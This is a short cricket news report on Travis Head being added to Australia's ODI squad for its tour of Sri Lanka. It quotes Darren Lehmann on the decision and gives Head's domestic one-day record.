South Australian captain Travis Head has been added to Australian's ODI squad for its tour of Sri Lanka.

The young batsman was initially left out of the 15-man touring squad, but has since been added to the side and will join his teammates this week.

He has made one previous ODI appearance, against the West Indies during the recent tri-series in the Caribbean.

The 22-year-old has been blistering form at domestic level at recent times and is seen as having a long term future in the Australian side.

“He’s a young player who has the attributes we think are quite important here,” Australian Darren Lehmann said.

“We want to give him as much experience, because he’s a young guy who’s had some success.

“He hasn’t had enough international exposure and we think it’s a really good time to do that, with an eye on the future as well.

“We’ve been impressed with him. That’s why he has come in a bit early. It’s only a couple of days earlier than the one-day squad.”

Head averages 36.85 in 30 domestic one-day matches, with three fifties and three centuries to his name.

The ODI series begins on August 21 at R.Premadasa Stadium in Colombo.
